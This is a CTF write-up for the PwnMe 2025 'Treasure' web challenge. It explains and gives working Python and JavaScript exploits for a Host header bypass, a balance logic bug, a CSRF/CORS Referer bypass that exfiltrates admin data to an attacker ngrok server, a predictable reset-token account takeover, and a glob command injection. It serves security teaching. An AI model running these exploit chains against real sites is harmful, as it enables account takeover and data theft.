PwnMe CTF 2025 (final): Treasure

PWNMECTF WEB HARD
Author: Fayred
I’m French, and I’m passionate about computers in general, and computer security in particular. A CTF enthusiast and a Bug Bounty novice, I’m primarily interested in learning, having fun, and sharing what I’ve learned.

Statement

Try registering on the “Treasure” website, which is still under construction and try to obtain an item that is normally impossible to obtain.

Author: Fayred

Treasure.zip

Overview

For this web challenge, here are the provided source files:

.
├── cert.pem
├── docker-compose.yml
├── Dockerfile
├── entrypoint.sh
├── key.pem
├── main.py
├── requirements.txt
└── src
    ├── admin_data_uploaded
    │   └── bf8fdd545086e4e7.json
    ├── app.py
    ├── backup.sh
    ├── blueprints
    │   ├── api.py
    │   └── render.py
    ├── bot.py
    ├── create_admin.py
    ├── models
    │   ├── inventory.py
    │   ├── reset_token.py
    │   └── user.py
    ├── static
    │   └── img
    │       └── items
    │           ├── Nothing.webp
    │           ├── The Banner of Eternal Whispers.jpeg
    │           ├── The Banner of Lost Souls.jpeg
    │           ├── The Celestial Dominion's Banner.jpeg
    │           ├── The Eternal Flame's Standard.jpeg
    │           └── Village Banner.jpeg
    ├── templates
    │   ├── admin.html
    │   ├── base.html
    │   ├── index.html
    │   ├── inventory.html
    │   ├── login.html
    │   ├── navbar.html
    │   └── register.html
    └── utils.py

9 directories, 31 files

In short, this challenge is a website built in Python using Flask. The site contains a login page and a registration page. However, the registration page seems to be accessible only from localhost. Once logged in, there is a section to drop items and an inventory section with account information. For the admin, there is a page allowing file uploads to the server and performing backups.

The flag is handed out when a user whose role is not admin obtains an item with the impossible rarity, as the statement hints and the code in api.py confirms.

api.py (L85-L86):

if item['rarity'] == 'impossible' and session.get('role') != 'admin':
    name = os.environ['FLAG']

Solution

To solve the challenge, we have to chain several bugs. First we need a way to create an account, then a way to generate money to buy a chest. Next comes an account takeover (ATO) of the admin account, so that we can change the drop rate of an item that is supposed to be impossible to obtain. Once all this is done, we simply drop an item with the account created first and retrieve the flag.

Code Analysis

Before starting to look for vulnerabilities, a quick code analysis is necessary.

app.py:

from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import secrets

app = Flask(__name__)
app.config['SECRET_KEY'] = secrets.token_urlsafe(32)
app.config['SESSION_COOKIE_SAMESITE'] = 'None'
app.config['SESSION_COOKIE_SECURE'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['ADMIN_PASSWORD'] = secrets.token_hex(32)
app.config['ADMIN_UPLOAD_FOLDER'] = 'src/admin_data_uploaded'
db = SQLAlchemy(app)

from .blueprints.render import render_bp
from .blueprints.api import api_bp

app.register_blueprint(render_bp, url_prefix='/')
app.register_blueprint(api_bp, url_prefix='/api')

from src.models.user import User
from src.models.inventory import Inventory
from src.models.reset_token import ResetToken
from src.create_admin import create_admin

with app.app_context():
    db.create_all()
    create_admin(username='admin', password=app.config['ADMIN_PASSWORD'])

In the app.py file, we can see that two blueprints are registered: render_bp, whose endpoints are mounted under the / prefix and defined in render.py, and api_bp, whose endpoints are mounted under the /api prefix and defined in api.py.

Here are the available routes:

  • /
  • /login
  • /register
  • /logout
  • /inventory
  • /admin
  • /api/drop
  • /api/inventory
  • /api/profile
  • /api/backup
  • /api/upload
  • /api/report
  • /api/reset_token
  • /api/change_password

Once logged in, all of them are accessible except /register, /admin, /api/backup, and /api/reset_token. These endpoints are restricted either to admin users or to clients coming from localhost. However, the localhost restriction can be bypassed.

Creating an account without being from localhost

To register, we will need to bypass the localhost_required() function located in the utils.py file.

utils.py (L29-L35):

def localhost_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if request.headers.get('Host') not in ['127.0.0.1:5000', 'localhost:5000']:
            return f'Forbidden', 403
        return f(*args, **kwargs)
    return decorated_function

Here we see that the function only checks the Host header: it verifies that Host is equal to 127.0.0.1:5000 or localhost:5000. Since this header is set by the client, we can simply send the expected value from any machine.
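
To make the weakness concrete, here is a minimal sketch in plain Python, with no Flask involved. host_header_check() mirrors the comparison made by localhost_required(). peer_is_loopback() is a hypothetical alternative that is not taken from the challenge: it looks at the address of the connecting peer instead (in Flask this would usually be request.remote_addr, assuming no reverse proxy in front). The address 172.19.0.1 is only an example of a non-local client.

```python
import ipaddress

ALLOWED_HOSTS = ['127.0.0.1:5000', 'localhost:5000']

def host_header_check(headers):
    """Mirror of the challenge's test: it trusts a client-supplied header."""
    return headers.get('Host') in ALLOWED_HOSTS

def peer_is_loopback(remote_addr):
    """Hypothetical stricter test: inspect the peer address of the connection."""
    return ipaddress.ip_address(remote_addr).is_loopback

# A remote client only has to send the expected Host value...
spoofed_headers = {'Host': '127.0.0.1:5000'}
print(host_header_check(spoofed_headers))  # True

# ...whereas its source address is not a loopback address.
print(peer_is_loopback('172.19.0.1'))      # False
print(peer_is_loopback('127.0.0.1'))       # True
```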

PoC:

import requests
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

username = 'ctfplayer'
password = 'ctfplayer'

# Step 1: Sign up without being from localhost
def register(username, password):
    requests.post(HOST + '/register', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        data={'username': username, 'password': password, 'password_confirmation': password}, 
        verify=False
    )
    
def login(username, password):
    login_request = requests.post(HOST + '/login',
        data={'username': username, 'password': password},
        allow_redirects=False,
        verify=False
    )
    return login_request.cookies['session']

if __name__ == '__main__':
    print(f"[+] Sign up with {username}:{password}")
    register(username, password)

    print(f"[+] Login with {username}:{password}")
    session = login(username, password)

Earning money via Business Logic Error

To drop an item, you need to buy a chest, and to buy a chest, you need money. However, a new user only has $20 in their account. Therefore, we need to find a way to generate money.

To do this, we need to exploit a bug located in api.py on the /api/drop route.

api.py (L45-L100):

@api_bp.route('/drop', methods=['GET', 'POST'])
@login_required
def drop():
    with open(os.environ['DROP_FILENAME'], 'r') as f:
        items = json.load(f).get('items')

    if request.method == 'GET':
        return jsonify({"chest_cost": CHEST_COST, "items": items})

    elif request.method == 'POST':
        user_id = session.get('user_id')
        balance = db.session.query(User).filter_by(id=user_id).first().balance

        data = request.get_json()
        nb = data.get('nb')

        if not nb:
            return jsonify({"error": "Missing number of chests."}), 400

        if int(nb) < 0:
            return jsonify({"error": "Cannot take less than 0."}), 400
        
        if int(nb) > 3:
            return jsonify({"error": "Cannot take more than 3."}), 400
        
        if balance < int(nb) * CHEST_COST:
            return jsonify({"error": "Not enough money."}), 400

        balance -= nb * CHEST_COST

        db.session.query(User).filter_by(id=user_id).update({'balance': balance})
        db.session.commit()

        items_dropped = drop_items(int(nb), items)

        for item in items_dropped:
            inventory_item = db.session.query(Inventory).filter_by(user_id=user_id, item_id=item['id']).first()
            if inventory_item:
                inventory_item.quantity += 1
            else:
                if item['rarity'] == 'impossible' and session.get('role') != 'admin':
                    name = os.environ['FLAG']
                else:
                    name = item['name']

                new_inventory_item = Inventory(
                    user_id=user_id,
                    item_id=item['id'],
                    name=name,
                    rarity=item['rarity'],
                    image=item['image']
                )
                db.session.add(new_inventory_item)
        db.session.commit()
        
        return jsonify({"items": items_dropped})

Here we see that nb must be between 0 and 3, and that nb is converted to an integer almost everywhere. The one exception is the line that adjusts the balance, which uses the raw value. This is a problem, because the new balance is derived from nb and nb can be manipulated to generate money. Indeed, if a user sends -0.999, the server computes balance -= -0.999 * 100, which adds $99.90 to the account. Since int() truncates toward zero, -0.999 is treated as 0 in every check, so the request is accepted.
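
The arithmetic can be replayed offline. The sketch below copies only the checks and the balance update from /api/drop; simulate_drop() is a name made up for this illustration, and CHEST_COST = 100 is an assumption inferred from the multiplication by 100 in the explanation above.

```python
CHEST_COST = 100  # assumption: inferred from the "* 100" in the explanation

def simulate_drop(balance, nb):
    """Replay the checks of /api/drop; return the new balance or an error string."""
    if not nb:
        return "Missing number of chests."
    if int(nb) < 0:
        return "Cannot take less than 0."
    if int(nb) > 3:
        return "Cannot take more than 3."
    if balance < int(nb) * CHEST_COST:
        return "Not enough money."
    return balance - nb * CHEST_COST  # nb is NOT truncated here

print(int(-0.999))                # 0: int() truncates toward zero
print(simulate_drop(20, -0.999))  # roughly 119.9
print(simulate_drop(20, -1))      # Cannot take less than 0.
```

With the starting balance of $20, a single request is enough to afford one chest.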

PoC:

import requests
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

# Step 2: Business Logic Error to earn money
def earn_money(session):
    requests.post(HOST + '/api/drop', 
        cookies={'session': session}, 
        json={'nb': -0.999},
        verify=False
    )

if __name__ == '__main__':
    session = 'xxx' # your session

    print("[+] Business Logic Error to Earn money")
    earn_money(session)

CSRF via CORS Misconfiguration and bypass of the Referer check

To modify the drop rate of an item that is impossible to obtain, we need access to the admin account. Since there is a bot.py file, which is used to visit URLs sent to /api/report, we suspect that we need to exploit a client-side vulnerability. In api.py, we have the /api/profile route, which allows us to access the personal information of the account.

api.py (L34-41) and (L116-L139):

def cors_config(response):
    response.headers['Access-Control-Allow-Origin'] = request.headers.get('Origin', '')

    referer = urllib.parse.unquote(request.headers.get('Referer', ''))
    if re.search('^https?:\\/\\/localhost:5000\\/.*', referer, re.MULTILINE):
        response.headers['Access-Control-Allow-Credentials'] = 'true'

    return response

...

@api_bp.route('/profile', methods=['OPTIONS'])
def options_profile():
    response = make_response('', 204)
    return cors_config(response)

@api_bp.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    if request.method == 'GET':
        user_id = session.get('user_id')
        user = db.session.query(User).filter_by(id=user_id).first()

        response = make_response(jsonify({
            'uuid': user.uuid, 
            'role': user.role, 
            'username': user.username, 
            'balance': user.balance,
        }))

        return cors_config(response)
    
    elif request.method == 'POST':
        response = make_response(jsonify({"success": "Profile updated."}))
        return cors_config(response)

In this code snippet, we see that this route is accessible via CORS from any origin, since the Origin header is reflected in the Access-Control-Allow-Origin header. However, the Access-Control-Allow-Credentials header is set to true only if the URL-decoded Referer header matches the regex: ^https?:\/\/localhost:5000\/.*. Before going further, we need to check that a cross-site request will carry the session cookie at all, which requires the SameSite=None attribute.

app.py (L7-L8):

app.config['SESSION_COOKIE_SAMESITE'] = 'None'
app.config['SESSION_COOKIE_SECURE'] = True

We can see here that the session cookie is set with SameSite=None. Now that we know this, we need to find a way to bypass the Referer check on this endpoint and leak the admin’s information. First, it is important to know that the Referer header cannot be set directly from JavaScript. However, we can make the browser send the full URL of the page we are on, path included, to another domain. To do this, we can pass the referrerPolicy: "unsafe-url" option to fetch(), which works on Chromium-based browsers but not on Firefox or Safari, for example.

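Once we know this, we simply need to perform our CSRF from a path that matches the regex. At first sight, the Referer has to start with http(s)://localhost:5000/. But since multiline mode is enabled, ^ also matches right after a newline, and since the Referer is URL-decoded before the check, an encoded newline (%0A) in the path of our page is enough: everything after it is seen as a new line starting with http://localhost:5000/. In the PoC, history.pushState() rewrites the path of the page before the request is sent.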
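
The bypass can be checked without a browser. The following sketch replays the Referer test from cors_config() on a raw header value; credentials_allowed() is a helper name invented for this example, and attacker.example stands in for the attacker-controlled origin.

```python
import re
import urllib.parse

PATTERN = '^https?:\\/\\/localhost:5000\\/.*'

def credentials_allowed(referer_header, flags=re.MULTILINE):
    """Replay the Referer test from cors_config() on a raw header value."""
    referer = urllib.parse.unquote(referer_header)
    return re.search(PATTERN, referer, flags) is not None

# attacker.example is a placeholder for the attacker-controlled origin.
crafted = 'https://attacker.example/%0Ahttp://localhost:5000/'

print(credentials_allowed('https://attacker.example/csrf'))  # False
print(credentials_allowed(crafted))                          # True
print(credentials_allowed(crafted, flags=0))                 # False
```

The last call shows that the same Referer is rejected once re.MULTILINE is dropped, which is why the flag is the root cause here.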

PoC:

import requests
import ngrok
from flask import Flask, request
import threading
import time
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

data = {}
csrf_end_event = threading.Event()

# Step 3: CSRF via CORS Misconfiguration with referer checker bypass 
def start_csrf_attack(session, url):
    def send_csrf():
        time.sleep(2)
        requests.post(HOST + '/api/report', 
            cookies={'session': session}, 
            json={'url': url + '/csrf'},
            verify=False
        )

    app = Flask(__name__)

    @app.route('/csrf')
    def csrf():
        return f"""
        <script>
            async function csrf(){{
                const response = await fetch("https://localhost:5000/api/profile", {{referrerPolicy: "unsafe-url", "credentials": "include"}});
                const data = await response.json();
                await fetch("{url}/exfiltration", {{
                    method: "POST",
                    headers: {{"Content-Type": "application/json"}},
                    body: JSON.stringify({{"data": data}})
                }});
            }}
            history.pushState(null, '', '%0Ahttp://localhost:5000/');
            csrf();
        </script>
        """
    
    @app.route('/exfiltration', methods=['POST'])
    def exfiltration():
        global data
        data = request.json.get('data')
        csrf_end_event.set()

        return 'Thanks!'

    threading.Thread(target=send_csrf, daemon=True).start()
    app.run(port=1337, debug=False)

if __name__ == '__main__':
    listener = ngrok.forward(1337, authtoken_from_env=True)
    url = listener.url()
    print(f"Ngrok: {url}\n")

    session = 'xxx' # your session

    print("[+] Start CSRF attack")
    threading.Thread(target=start_csrf_attack, args=(session, url), daemon=True).start()
    if csrf_end_event.wait(60):
        print(f"Data exfiltrated: {data}")

Generating a reset token via UUID leak and ATO of the admin

Thanks to the CSRF, we can leak the admin’s information, including uuid. This uuid is used in utils.py to generate a token.

utils.py (L37-L39):

def generate_reset_token(username, uuid):
    reset_token = hashlib.sha1(username.encode() + uuid.encode()).hexdigest()
    return reset_token

This generate_reset_token() function is used in api.py on the /api/reset_token route. We see that the reset token corresponds to the SHA1 of the concatenation of the username and the uuid. Therefore, we can predict the reset token with the uuid leak and change the admin’s password on the /api/change_password route.

api.py (L212-235):

@api_bp.route('/change_password', methods=['POST'])
@nologin_required
def change_password():
    password = request.json.get('password')
    password_confirmation = request.json.get('password_confirmation')
    token = request.json.get('token')

    if password != password_confirmation:
        return jsonify({"error": "Passwords do not match."}), 400

    reset_token = db.session.query(ResetToken).filter_by(token=token).first()

    if not reset_token:
        return jsonify({"error": "Invalid reset token."}), 400 
    
    if reset_token.is_expired():
        return jsonify({"error": "Token has expired."}), 400

    db.session.query(User).filter_by(id=reset_token.user_id).update({
        'password': generate_password_hash(password)
    })
    db.session.commit()

    return jsonify({"success": "Password changed."})

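We see that we simply need to send the new password and the reset token predicted from the admin username and the leaked uuid. The token is looked up in the database, so the PoC first calls /api/reset_token for admin, reusing the Host header bypass, presumably so that the token is stored before we use it.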
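
As a quick illustration of why the token is predictable, the sketch below recomputes it the same way generate_reset_token() does. The uuid is a placeholder, not a real leak, and random_reset_token() is a hypothetical contrast (not part of the challenge) showing a token that does not depend on account data.

```python
import hashlib
import secrets

def predict_reset_token(username, uuid):
    """Same derivation as generate_reset_token(): SHA-1 over username + uuid."""
    return hashlib.sha1(username.encode() + uuid.encode()).hexdigest()

def random_reset_token():
    """Hypothetical alternative: a token that does not depend on account data."""
    return secrets.token_urlsafe(32)

leaked_uuid = '00000000-0000-0000-0000-000000000000'  # placeholder value
token = predict_reset_token('admin', leaked_uuid)

# Anyone who knows both inputs gets the same token every time.
print(token == predict_reset_token('admin', leaked_uuid))  # True
# Two random tokens are, in practice, never equal.
print(random_reset_token() == random_reset_token())
```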

PoC:

import requests
import hashlib
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

username_ato = 'admin'
password = 'ctfplayer'

# Step 4: Generate reset token via UUID leak by CSRF to ATO admin account
def ato(uuid, username, password):
    requests.post(HOST + '/api/reset_token', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        json={"username": username},
        verify=False
    )
    requests.post(HOST + '/api/change_password',
        json={
            "password": password,
            "password_confirmation": password,
            "token": hashlib.sha1(username.encode() + uuid.encode()).hexdigest()
        },
        verify=False
    )

if __name__ == '__main__':
    print("[+] Account Take Over")

    uuid = 'xxx' # uuid leak
    ato(uuid, username_ato, password)

Command Injection to leak the .json filename

Now that we are admin, we can access /admin. With this page, we can upload files to the server and perform a backup. To upload files to the server, a request is made to /api/upload, and to perform a backup, a request is made to /api/backup.

api.py (L141-150):

@api_bp.route('/backup', methods=['POST'])
@admin_required
def backup():
    t = request.json.get('time')
    if re.search(r'[A-Za-z!"#%&\'()*+,-./:;<=>@[\]^_`{|}~ \\]', t):
        return jsonify({"error": "Invalid time."}), 400

    output = os.popen(f'cd src/admin_data_uploaded && timeout {t}s ../backup.sh 2>&1').read()
    
    return jsonify({"output": output})

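For the “backup” part, we can see that time is injected into os.popen() to stop the command if it runs longer than the given time. This leads to a Command Injection, but the filter leaves very little to work with: among printable ASCII characters, only ?, $ and digits are accepted. It does not seem possible to get RCE under these conditions. However, it is possible to leak the name of the .json file containing the drop rates. To do this, we can use the ? wildcard, which matches exactly one character, so that a run of 21 ? expands to any 21-character file name in src/admin_data_uploaded, such as bf8fdd545086e4e7.json. The trailing $ deals with the s appended by the command: $s is read as an unset variable and expands to nothing, leaving only the wildcard. timeout then receives the file name instead of a duration, and its error message, captured through 2>&1, is returned in output.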
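
Both halves of the trick can be checked locally. In this sketch the filter regex is copied from /api/backup, while the wildcard expansion is only simulated with Python's fnmatch module, which implements shell-style patterns; no shell is invoked. The second file name, notes.txt, is made up to show that names of other lengths are ignored.

```python
import fnmatch
import re

BLOCKLIST = r'[A-Za-z!"#%&\'()*+,-./:;<=>@[\]^_`{|}~ \\]'
payload = '?' * 21 + '$'

# The payload contains none of the rejected characters.
print(re.search(BLOCKLIST, payload))  # None

# Simulated directory listing; notes.txt is a made-up extra file.
uploaded = ['bf8fdd545086e4e7.json', 'notes.txt']

# Each "?" stands for exactly one character, so 21 of them
# only match names that are exactly 21 characters long.
matches = fnmatch.filter(uploaded, '?' * 21)
print(matches)  # ['bf8fdd545086e4e7.json']
```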

PoC:

import requests
import re
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

# Step 5: OS Command Injection which leads to json filename leak
def os_command_injection(admin_session):
    backup_req = requests.post(HOST + '/api/backup', 
        cookies={'session': admin_session}, 
        json={"time": "?????????????????????$"},
        verify=False
    )
    filename_leak = re.search(r'[\w-]+\.json', backup_req.json()['output']).group(0)
    return filename_leak

if __name__ == '__main__':
    session_ato = 'xxx' # admin session

    print("[+] Leak .json filename")
    filename_leak = os_command_injection(session_ato)

Uploading a new .json file to obtain the impossible item

Now that the name of the .json file has been leaked, we simply need to upload a file with the same name, in which we set a 100% drop rate for an item with impossible rarity.
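
One way to avoid syntax mistakes in the replacement file is to build it from a Python dictionary rather than typing the JSON by hand. This is a small sketch, not the method used in the PoC: build_drop_table() is a hypothetical helper, and the item fields are the ones used in the upload payload of this writeup.

```python
import json

def build_drop_table():
    """Serialise a drop table holding a single 'impossible' item at a 100% rate."""
    table = {
        "items": [{
            "id": 1337,
            "rarity": "impossible",
            "name": "The Celestial Dominion's Banner",
            "drop_rate": 100,
            "image": "The Celestial Dominion's Banner.jpeg",
        }]
    }
    return json.dumps(table, indent=4)

payload = build_drop_table()

# Round-trip through json.loads, mirroring the json.load(f).get('items')
# call made by /api/drop when it reads the file.
items = json.loads(payload).get('items')
print(items[0]['rarity'], items[0]['drop_rate'])  # impossible 100
```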

PoC:

import requests
import io
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

# Step 6: Upload and replace the json file with item rate drop for "impossible" rarity to 100%
def upload_file(admin_session, filename):
    data = """
        {
            "items": [
                {"id": 1337, "rarity": "impossible", "name": "The Celestial Dominion's Banner", "drop_rate": 100, "image": "The Celestial Dominion's Banner.jpeg"}
            ]
        }
        """

    file = io.BytesIO(data.encode('utf-8'))

    requests.post(HOST + '/api/upload', 
        cookies={'session': admin_session},
        files={'file': (filename, file, 'application/json')},
        verify=False
    )

if __name__ == '__main__':
    filename_leak = 'xxx' # .json filename leak
    session_ato = 'xxx' # admin session

    print(f"[+] Replace '{filename_leak}' to get 100% of chance")
    upload_file(session_ato, filename_leak)

Once the file is uploaded, we simply return to the regular user account created earlier and drop an item with the money earned, which finally gives us the flag.

Exploit

Final PoC:

# Treasure PoC

# pip install requests flask ngrok
# export your NGROK_AUTHTOKEN before running the script

import requests
import ngrok
from flask import Flask, request
import threading
import time
import hashlib
import re
import io
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

username_ato = 'admin'
username = 'ctfplayer'
password = 'ctfplayer'

data = {}
csrf_end_event = threading.Event()

# Step 1: Sign up without being from localhost
def register(username, password):
    requests.post(HOST + '/register', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        data={'username': username, 'password': password, 'password_confirmation': password}, 
        verify=False
    )

def login(username, password):
    login_request = requests.post(HOST + '/login',
        data={'username': username, 'password': password},
        allow_redirects=False,
        verify=False
    )
    return login_request.cookies['session']

# Step 2: Business Logic Error to earn money
def earn_money(session):
    requests.post(HOST + '/api/drop', 
        cookies={'session': session}, 
        json={'nb': -0.999},
        verify=False
    )

# Step 3: CSRF via CORS Misconfiguration with referer checker bypass 
def start_csrf_attack(session, url):
    def send_csrf():
        time.sleep(2)
        requests.post(HOST + '/api/report', 
            cookies={'session': session}, 
            json={'url': url + '/csrf'},
            verify=False
        )

    app = Flask(__name__)

    @app.route('/csrf')
    def csrf():
        return f"""
        <script>
            async function csrf(){{
                const response = await fetch("https://localhost:5000/api/profile", {{referrerPolicy: "unsafe-url", "credentials": "include"}});
                const data = await response.json();
                await fetch("{url}/exfiltration", {{
                    method: "POST",
                    headers: {{"Content-Type": "application/json"}},
                    body: JSON.stringify({{"data": data}})
                }});
            }}
            history.pushState(null, '', '%0Ahttp://localhost:5000/');
            csrf();
        </script>
        """
    
    @app.route('/exfiltration', methods=['POST'])
    def exfiltration():
        global data
        data = request.json.get('data')
        csrf_end_event.set()

        return 'Thanks!'

    threading.Thread(target=send_csrf, daemon=True).start()
    app.run(port=1337, debug=False)

# Step 4: Generate reset token via UUID leak by CSRF to ATO admin account
def ato(uuid, username, password):
    requests.post(HOST + '/api/reset_token', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        json={"username": username},
        verify=False
    )
    requests.post(HOST + '/api/change_password',
        json={
            "password": password,
            "password_confirmation": password,
            "token": hashlib.sha1(username.encode() + uuid.encode()).hexdigest()
        },
        verify=False
    )

# Step 5: OS Command Injection which leads to json filename leak
def os_command_injection(admin_session):
    backup_req = requests.post(HOST + '/api/backup', 
        cookies={'session': admin_session}, 
        json={"time": "?????????????????????$"},
        verify=False
    )
    filename_leak = re.search(r'[\w-]+\.json', backup_req.json()['output']).group(0)
    return filename_leak

# Step 6: Upload and replace the json file with item rate drop for "impossible" rarity to 100%
def upload_file(admin_session, filename):
    data = """
        {
            "items": [
                {"id": 1337, "rarity": "impossible", "name": "The Celestial Dominion's Banner", "drop_rate": 100, "image": "The Celestial Dominion's Banner.jpeg"}
            ]
        }
        """

    file = io.BytesIO(data.encode('utf-8'))

    requests.post(HOST + '/api/upload', 
        cookies={'session': admin_session},
        files={'file': (filename, file, 'application/json')},
        verify=False
    )

# Step 7: Get the flag
def get_flag(session):
    requests.post(HOST + '/api/drop', 
        cookies={'session': session}, 
        json={'nb': 1},
        verify=False
    )
    inventory_req = requests.get(HOST + '/api/inventory', 
        cookies={'session': session},
        verify=False
    )

    # The flag is stored as the name of the first item with the impossible rarity
    flag = next(item['name'] for item in inventory_req.json() if item['rarity'] == 'impossible')
    return flag

if __name__ == '__main__':
    listener = ngrok.forward(1337, authtoken_from_env=True)
    url = listener.url()
    print(f"Ngrok: {url}\n")

    print(f"[+] Sign up with {username}:{password}")
    register(username, password)

    print(f"[+] Login with {username}:{password}")
    session = login(username, password)

    print("[+] Business Logic Error to Earn money")
    earn_money(session)

    print("[+] Start CSRF attack")
    threading.Thread(target=start_csrf_attack, args=(session, url), daemon=True).start()
    if csrf_end_event.wait(60):
        print(f"Data exfiltrated: {data}")

        print("[+] Account Take Over")
        ato(data['uuid'], username_ato, password)

        print(f"[+] Login with {username_ato}:{password}")
        session_ato = login(username_ato, password)

        print("[+] Leak .json filename")
        filename_leak = os_command_injection(session_ato)

        print(f"[+] Replace '{filename_leak}' to get 100% of chance")
        upload_file(session_ato, filename_leak)

        print(f"[+] Get the flag from '{username}'")
        flag = get_flag(session)
        print(f"\nFlag: {flag}")

Flag: PWNME{56837e80d608e85bb886f2b4b66a47c9}
